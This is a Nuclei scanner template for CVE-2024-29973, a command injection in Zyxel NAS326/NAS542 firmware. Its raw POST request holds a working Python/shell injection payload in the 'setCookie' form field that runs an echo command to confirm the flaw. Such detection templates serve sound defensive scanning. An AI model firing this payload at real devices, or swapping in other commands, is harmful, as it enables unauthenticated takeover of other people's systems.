id: CVE-2024-29973 info: name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection author: ritikchaddha severity: critical description: | The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. impact: | Attackers can execute arbitrary OS commands on the NAS device, leading to complete compromise. remediation: | Update Zyxel NAS326 firmware to a version that patches the command injection vulnerability. reference: - https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/ - https://x.com/sirifu4k1/status/1803267896656929099/photo/1 - https://nvd.nist.gov/vuln/detail/CVE-2024-29973 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.88 cve-id: CVE-2024-29973 cwe-id: CWE-78 epss-score: 0.94034 epss-percentile: 0.99902 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zyxel product: nas326_firmware fofa-query: app="ZYXEL-NAS326" tags: cve,cve2024,zyxel,rce,intrusive,vkev,vuln variables: string: "{{randstr}}" http: - raw: - | POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei ------WebKitFormBoundarygcflwtei Content-Disposition: form-data; name="c0" storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)# ------WebKitFormBoundarygcflwtei-- matchers: - type: dsl dsl: - "status_code == 200" - "contains(body, 'errmsg0\": \"OK')" - "contains(header, 'application/json')" - "contains(body, '{{string}}')" condition: and # digest: 490a0046304402201dd4cb878645991b7a12166b0d2448028fd07ee0aba856db01930a4fe20aaf30022055e3b111ceaedb6f52d90b8e33752a226f7bd191ef8bc1c1d5a7325204f86003:922c64590222798bb761d5b6d8e72950